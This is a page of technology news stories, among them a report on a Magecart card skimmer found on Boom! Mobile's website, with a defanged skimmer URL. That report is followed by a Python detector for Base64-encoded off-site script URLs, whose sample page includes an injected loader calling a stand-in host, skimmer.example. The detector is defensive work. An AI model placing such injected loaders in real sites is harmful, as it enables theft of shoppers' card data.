More stories

  • ST Engineering bolsters cloud portfolio with CloudSphere investment

    ST Engineering has beefed up its cloud services portfolio via an investment in CloudSphere, a US-based cloud management and governance vendor. Made through its venture capital arm ST Engineering Ventures, the investment will see the Singapore company expand its current cloud services beyond assessment and migration. 
    The investment round was made alongside growth equity tech fund, Atlantic Bridge Capital, and would provide ST Engineering “direct access” to hybrid and multi-cloud management and governance software and services, the Singapore company said in a statement Tuesday. It added that the investment was part of the organisation’s efforts to drive its capabilities in professional and management services in public cloud. 
    ST Engineering is a technology, defence, and engineering group focusing on the aerospace, electronics, land systems, and marine sectors. Its VC arm invests in startups in high-growth areas such as robotics, autonomous technology, and cybersecurity. 
    ST Engineering’s president of electronics sector Ravinder Singh noted that enterprises operating in hybrid and multi-cloud environments were using many different sets of tools, including in resource provisioning and monitoring, cost reporting, and security, as well as identity dashboards with multiple, disparate control planes. 
    ST Engineering’s investment in CloudSphere would afford its customers “greater visibility and control” of their multi-cloud inventory, performance, and costs, Singh said. This expansion of its managed services portfolio would enable ST Engineering to tap opportunities with cloud technology, he added.
    Amongst CloudSphere’s offerings is its flagship cloud governance platform, which allows customers to manage public cloud deployments with automation tools. 
    ZDNet asked ST Engineering several questions including the growth rate of its cloud services and how much it invested in CloudSphere. This article will be updated when the company responds. 

  • GitHub: Now our built-in bug checker gets these third-party code-scanning tools

    GitHub has released a host of third-party security tools for its just-launched code-scanning feature, which helps open-source projects nix security bugs before they hit production code. 
    GitHub Code Scanning works on top of CodeQL (Query Language), a technology that GitHub integrated into its platform after it acquired code-analysis platform Semmle in September 2019. GitHub announced general availability of code scanning last week after a beta phase that’s run since May.   

    GitHub has now introduced 10 new third-party code-scanning tools that are available with GitHub code scanning to allow developers to remove flaws before they’re committed to code. 
    The ability to add third-party tools to the native GitHub code-scanning feature lets developers customize it for different teams in an organization. 
    Extensibility is enabled via code scanning’s application protocol interface endpoint, which ingests the results of scans from third-party tools using the Static Analysis Results Interchange Format (SARIF).
    GitHub sees it being valuable for organizations post-merger with teams running different code-scanning tools, as well as for extending coverage to mobile, Salesforce development or mainframe development. It also enables customized reporting and dashboards. 
    The new third-party scanning tools include extensions for static analysis and developer security training. 
    The current roster includes Checkmarx, Codacy, CodeScan, DefenseCode ThunderScan, Fortify on Demand, Muse, Secure Code Warrior, Synopsys Intelligent Security Scan, Veracode Static Analysis, and Xanitizer.   
    Developers can begin using third-party scanning tools with GitHub Actions, a feature that allows users to automate development workflows, or a GitHub App based on an event, such as a pull request. 
    GitHub then handles the rest of the task, ensuring there are no duplicates and that alerts are aggregated and associated with each tool that generates a report. 
    “The results are formatted as SARIF and uploaded to the GitHub Security Alerts tab. Alerts are then aggregated per tool and GitHub is able to track and suppress duplicate alerts,” explains Jose Palafox of GitHub. 
    “This allows developers to use their tool of choice for any of their projects on GitHub, all within the native GitHub experience.” 
    The third-party scanners are available on GitHub’s marketplace. 
    During the beta, GitHub says code scanning was used to perform more than 1.4 million scans on more than 12,000 repositories. It’s helped identify over 20,000 vulnerabilities.


  • FireEye’s Mandiant debuts new SaaS threat intelligence suite

    Mandiant has launched Mandiant Advantage: Threat Intelligence, a software-as-a-service (SaaS) platform designed for security response teams. 

    Announced on Tuesday, the FireEye-owned cyberforensics firm said the new solution is the first SaaS offering in its portfolio and will combine threat intelligence gathered by Mandiant together with data from cyber incident response engagements. 
    Delivered through a one-stop-shop platform, Mandiant Advantage: Threat Intelligence leans on real-time information collected by over 300 researchers and analysts.
    “By extending this timely look into what’s happening across multiple Mandiant frontlines, organizations can more easily prioritize the threats that matter to them most right now,” the company said.
    Over time, more Mandiant Advantage SaaS products will be developed “to augment and automate global security teams with controls-agnostic, actionable breach, adversary, operational and machine intelligence data.”
    Planned upgrades include validation on demand — potentially including checks for email filter rules, database configuration, and operating system controls and updates — as well as malware analysis as a service.
    Mandiant Advantage: Threat Intelligence is subscription-based and is priced depending on the size of the organization signing up. In addition, the solution includes API integration and a browser plugin. 
    “We are now making emerging intelligence accessible to all defenders as it is discovered, regardless of the technology they have deployed,” Sandra Joyce, executive VP of Mandiant Threat Intelligence at FireEye commented. “Now customers of all sizes have unprecedented access to the depth and breadth of threat intelligence Mandiant offers, appropriate to their budget and unique needs.”
    Mandiant Solutions was launched in April this year in order to streamline FireEye and Mandiant’s portfolio. Now, the term brings Mandiant Consulting, Mandiant Managed Defense, FireEye Threat Intelligence, FireEye Expertise On Demand, and Mandiant Security Validation under the same umbrella — together with the firm’s latest cybersecurity offering. 

    Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0

  • F5 Networks intros new fraud detection engine based on Shape Security acquisition

    F5 Networks on Tuesday introduced Shape AI Fraud Engine (SAFE), a new SaaS offering that promises to eliminate fraudulent online transactions that can sometimes bypass other security and fraud detection controls.

    Leveraging technology from its $1 billion acquisition of Shape Security earlier this year, F5’s SAFE service evaluates online transactions via AI in order to understand user intent and block potential fraud before it occurs. The product marks F5’s first real push into the fraud market since acquiring Shape Security, the company said.
    Following its acquisition of Shape Security, F5 has integrated Shape’s capabilities into its portfolio of application security services, with F5 serving as a traffic flow insertion point for Shape’s online fraud and abuse prevention solutions. F5’s app security services specialize in protecting applications across multi-cloud environments.
    “The need for innovation in fraud prevention becomes more urgent when you factor in the accelerated shift to online channels driven by the current global health situation,” said Sumit Agarwal, VP of analytic products at F5, and co-founder of Shape. “We’re seeing fraudsters launch increasingly sophisticated attacks that take advantage of COVID-driven shifts and overall economic distress.”
    Earlier this year F5 announced a series of new multi-cloud application security services, including a service that brought its Web Application Firewall (WAF) technology to the NGINX platform stemming from the company’s acquisition of NGINX. 
    The acquisitions of Shape Security and NGINX and recent product launches have allowed F5 to reframe its approach to security with a focus on four key areas: application layer security, trusted application access, application infrastructure security and intelligent threat services. The Shape AI Fraud Engine fits into this approach and gives F5 an entry point into the fraud prevention market. The service is available now.

  • Apricorn releases industry’s largest hardware-encrypted storage drive

    External hard drives are a great backup and portable storage solution, but if they are used to store sensitive data, they can quickly become a huge security headache.
    While there is no end of external storage drives that come with software encryption solutions, they are far from ideal in situations where security is a must.
    Not only do you need the encryption/decryption software installed on all the devices you want to hook up the external drive to, but you better hope that there’s a version available for the platform you’re using. You’re probably going to be in luck if you’re running the latest version of Windows or Mac, but if you happen to run an older version of an OS, or something more exotic like Linux or Android, or perhaps an embedded system, then a software-based solution is likely to steer you into the tarpits.
    This is why I like hardware solutions such as the Apricorn Aegis Padlock DT drive.

    I reviewed an Aegis Padlock DT drive a couple of years ago, and I still use one for long-term storage of sensitive data. Back then, the upper storage limit on the drive was 12TB.
    12TB is a lot, but Apricorn realized that some people have greater storage needs, and has expanded the line to include 18TB of storage.
    Apart from featuring the largest encrypted external USB storage capacity in its class, the Aegis Padlock DT drives offer nine capacities of secure storage, ranging from 2TB to 18TB. The drive features 256-bit AES XTS hardware-based encryption and has a polymer-coated wear-resistant on-board keypad for quick PIN authentication.
    The drive’s firmware is also locked to prevent tampering with it, which Apricorn claims makes its products resistant to attacks such as BadUSB.
    On the connectivity front, the Aegis Padlock DT uses ultra-fast USB 3.2 Gen 1 (3.0) data transfer speeds, and all data is encrypted on the fly as it’s being written to the drive, while the devices’ PINs and data remain encrypted when the drives are at rest.
    The drive is also crammed with security features, including brute-force protection, unattended auto-lock, separate admin and user modes, and even a self-destruct mode (the drive doesn’t explode, it just returns to the factory mode and looks like it hasn’t been set up).
    “The Padlock DT FIPS are secure, easy to use drives for organizations that want to ensure their sensitive data is secure at all times. As ransomware continues to be one of the most dominant cyber threats organizations face, businesses must back up their data and store it disconnected from the network to enable fast recovery in the event of a cyber-attack whilst encrypting it to comply with data protection legislation,” said Jon Fielding, Managing Director, EMEA Apricorn. “Adding the 18TB drive to our product set provides businesses increased storage capabilities and the assurance that should they be targeted, they can thwart ransomware attempts with a secure encrypted data backup,” Fielding added.
    The Apricorn Aegis Padlock DT is a solid, reliable, well-constructed storage solution for those looking for robust, secure storage.

  • Boom! Mobile falls prey to Magecart card-skimming attack

    A mobile network operator has fallen victim to a Magecart campaign designed to steal consumer financial data. 

    Malwarebytes researchers said on Monday that one of the latest organizations targeted by a Magecart group is Boom! Mobile, whose US website has been compromised and is, at the time of writing, actively being used to harvest shopper information. 
    The researchers said that Boom!, a mobile operator that claims transparency and ease-of-use as their main selling points, has so far not responded to efforts to wipe out the Magecart infection. 
    Magecart is an umbrella term describing credit-card skimmer attacks and numerous cyberthreat groups that now specialize in this area. Typically, attacks are performed by exploiting a vulnerability in a website domain — including back-end content management systems (CMS) — in order to load JavaScript-based scripts able to skim data.
    In order to avoid detection for as long as possible, threat actors may limit the injection of skimmer code to payment portal pages. 
    Once card data has been stolen and whisked away to an attacker-controlled command-and-control server (C2), this information can be sold on in bulk, used to create clone cards, or to conduct fraudulent purchases.  
    Previous victims of Magecart attacks include Ticketmaster and British Airways.
    Malwarebytes says that in Oklahoma-based Boom! Mobile’s case, one of the cybersecurity firm’s crawlers found a one-line code injection containing a Base64 encoded URL leading to an external JavaScript library.
    Once decoded, the URL loads a script disguised as a Google Analytics element while using the link paypal-debit[.]com/cdn/ga.js.
    “We quickly recognize this code as a credit card skimmer that checks for input fields and then exfiltrates the data to the criminals,” the researchers said. 
    The skimmer itself, however, is far from quiet. Rather than silently grab a large swathe of data and send it in one go, data is exfiltrated every time changes are detected in fields on a page — such as those used to input card details. The team noted that each leak can be viewed as a separate GET request.
    It is possible that the website’s compromise was due to the use of an old version of PHP that is no longer supported. 
    The group believed to be responsible is related to Fullz House, which has previously been traced to Magecart attacks using the same malicious domain and code. Fullz is a slang term used to describe data dumps containing ‘full’ stolen personally identifiable information (PII) and payment card data.  
    RiskIQ published a report on Fullz House, also tracked as Magecart Group 4, in 2019. The group has diversified into both phishing and card-skimming campaigns but overlaps in domain and IP infrastructure have allowed researchers to connect the dots. In September, new fraudulent domains were registered by the group.
    Malwarebytes has reported the active infection to the mobile service provider via live chat and email, but as of now, the company has not responded. 
    “Their website is still compromised and online shoppers are still at risk,” the team added. 
    ZDNet has reached out to Boom! Mobile for comment and will update when we hear back. 
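
    A site owner can check page source for the pattern described above: a Base64 string that decodes to a script URL on a host the site does not normally use, with a file name imitating Google Analytics. The following is an added example, not Malwarebytes' crawler or code from the article; the allowlist, the `skimmer.example` host, the sample page and all function names are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Hosts this site is expected to load scripts from (assumed for the example).
ALLOWED_HOSTS = {"www.google-analytics.com", "www.googletagmanager.com"}
# File names used by the genuine Google Analytics loaders, often imitated.
GA_LOOKALIKE_NAMES = {"ga.js", "analytics.js", "gtag.js"}

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
SCRIPT_SRC = re.compile(r"<script[^>]+src=[\"']([^\"']+)[\"']", re.I)


def decode_if_url(token):
    """Return the decoded text if a Base64 token hides an http(s) or // URL."""
    padded = token + "=" * (-len(token) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if re.match(r"(https?:)?//[\w.-]+/", text) else None


def host_of(url):
    """Host name of an absolute or protocol-relative URL, '' for relative paths."""
    full = url if "://" in url else "https:" + url
    return (urlparse(full).hostname or "").lower()


def classify(url, encoded):
    """Label a script URL, or return None for same-origin and allowlisted hosts."""
    host = host_of(url)
    if not host or host in ALLOWED_HOSTS:
        return None
    name = urlparse(url).path.rsplit("/", 1)[-1]
    label = "ga-lookalike" if name in GA_LOOKALIKE_NAMES else "offsite-script"
    return ("encoded-" if encoded else "") + label


def scan_page(html):
    """Return (label, url) findings for encoded and plain script references."""
    findings = []
    for token in B64_TOKEN.findall(html):
        url = decode_if_url(token)
        if url and classify(url, encoded=True):
            findings.append((classify(url, encoded=True), url))
    for src in SCRIPT_SRC.findall(html):
        label = classify(src, encoded=False)
        if label:
            findings.append((label, src))
    return findings


# Constructed sample: a checkout page with one encoded, off-site script URL.
HIDDEN = base64.b64encode(b"//skimmer.example/cdn/ga.js").decode()
SAMPLE_PAGE = f"""<html><head>
<script src="https://www.google-analytics.com/analytics.js"></script>
<script src="/static/checkout.js"></script>
<script>/* constructed stand-in for the injected one-liner */ load(atob('{HIDDEN}'))</script>
</head><body><form id="pay"><input name="card"></form></body></html>"""

if __name__ == "__main__":
    for label, url in scan_page(SAMPLE_PAGE):
        print(label, url)
```

    Running the same scan on each payment page after every deployment, and alerting on any new finding, gives the site owner a diff-style signal; a Content-Security-Policy `script-src` allowlist enforces the same host list in the browser.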


  • Budget 2020: Commonwealth Ombudsman scores AU$1.6m to oversee encryption laws

    If there is one word to sum up the Australian Budget of 2020-21, it is pre-announced.

    As far back as June, it’s been possible to see the framework that the government has used for its cyber announcements, at the time announcing AU$1.35 billion for its Cyber Enhanced Situational Awareness and Response (CESAR) package.
    By August, another AU$320 million was kicked in via the 2020 Cyber Security Strategy to take the total to the AU$1.7 billion — the figure being thrown about with maddening glee in the papers.  
    One of the rare notable pieces of funding was the fulfilment of the wish from the Commonwealth Ombudsman for more funding.
    “The government will provide AU$1.6 million in 2020-21 (including $0.9 million in capital funding) to the Office of the Commonwealth Ombudsman to ensure that it can effectively oversee the use of the new Telecommunications and other Legislation Amendment (Assistance and Access) Act 2018 by law enforcement agencies,” the Budget papers stated.
    “This measure will be offset by redirecting funding from the Department of Home Affairs.”
    The irony is Ombudsman Michael Manthorpe was looking for funding to handle the proposed Telecommunications Legislation Amendment (IPO) Bill 2020 that would allow for Australia to work towards a bilateral agreement with the United States in order to implement the US CLOUD Act.
    Entering into a bilateral CLOUD Act agreement would enable Australian law enforcement to serve domestic orders for communications data needed to combat serious crime directly on US-based companies, and vice versa.  
    “If passed, the IPO Bill will make it easier for law enforcement agencies to obtain certain electronic information under proposed and future bilateral or multilateral agreements, when compared to current mutual legal assistance arrangements,” Manthorpe wrote at the time.
    “On this basis, I anticipate that not only will the number of inspections my office is required to perform increase, but so too will the volume of electronic information accessed by Australian law enforcement agencies which my staff will need to assess.”
    Elsewhere in the Budget papers, AU$12.7 million has been set aside for an Australia-India cyber and critical technology partnership as part of a AU$62 million plan across four years to “support the Comprehensive Strategic Partnership with India”, which includes AU$19.5 million to focus on science, technology, and innovation. This announcement was made on June 4.
    The government also said it would spend AU$222 million over four years with AU$22.3 million ongoing to improve and modernise the IT systems and business practices related to export regulations in the agricultural sector. The money will go towards “simplifying interactions between farmers and exporters and the Department of Agriculture, Water and the Environment”, integrating systems to lower “regulatory burden”, as well as “mitigating export system outages and improving the cybersecurity of information”.
    AU$4.9 million will also be spent across two years to “build, consolidate, and strengthen cybersecurity capability in the energy sector”, which is in addition to the AU$4.7 million that will be spent in 2020-21 on the Australian Sports Foundation to help the fundraising of community sports clubs and boost the network and cyber functions of the organisation.
    Across the Cyber Security Strategy, AU$21 million will be spent in 2020-21, AU$43 million will follow in 2021-22, a further AU$37.3 million will appear in 2022-23, and AU$48 million is allocated for 2023-24. This brings the noted allocations to just over AU$149 million across the forward estimates.
    Of that, the Australian Signals Directorate will lose AU$10.7 million in 2020-21, followed by AU$10.8 million of funding related to the strategy in 2021-22, and AU$11 million for 2022-23. No funding is allocated for 2023-24.
    Across the four years, the Australian Federal Police will get almost AU$90 million, Home Affairs will get AU$54.2 million related to the strategy, and the Department of Industry, Science, Energy, and Resources will get AU$37.7 million.
    The Budget papers stated the $1.4 billion in funding for CESAR will be spent over a decade, and that it would be offset by pulling funding from elsewhere within Defence. 
    The papers also stated the Office of the eSafety Commissioner would receive AU$39.4 million over three years to “continue its work keeping Australian families safe”.
    “The additional funding will enable the Office of the eSafety Commissioner to respond to a sustained increase in demand for its existing programs and fulfil additional functions and responsibilities, including overseeing a new adult cyber abuse takedown scheme under the new Online Safety Act.”


  • UN maritime agency says it was hacked


    The United Nations International Maritime Organization (UN IMO) disclosed a security breach over the weekend that the agency categorized as a “sophisticated cyber-attack” against its IT systems.
    The incident was discovered on Thursday and impacted the IMO public website and other web-based services, the UN agency said in a press release.
    Email systems, its virtual conferencing platform, along with other internal and external collaboration platforms, were unaffected, an IMO spokesperson said.
    Affected systems were taken down and then restored by Friday, October 2.
    The agency said the attack “overcame robust security measures” it had in place to protect its IT systems.
    “The IMO Headquarters file servers are located in the UK, with extensive backup systems in Geneva. The backup and restore system is regularly tested,” the agency said.
    “Following the attack, the Secretariat shut down key systems to prevent further damage from the attack. The Secretariat is working with international security experts to restore systems as soon as possible, to identify the source of the attack, and further enhance security systems to prevent recurrence.”
    An IMO spokesperson acknowledged a request for comment from ZDNet but did not return an email seeking more details about the nature of the cyberattack.
    It is unclear if the IMO was hit by ransomware, a website defacement, or its website was used for a watering hole attack, a type of attack where hackers host malicious code on the IMO website in an attempt to trick IMO members and visitors into downloading and infecting themselves with malware.
    The IMO is the UN organization that issues international guidance on shipping, passenger ships, maritime security, and maritime environmental protection. Due to its central role in international rule-making, it is a highly important organization that often sets international policies in regard to the entire maritime field.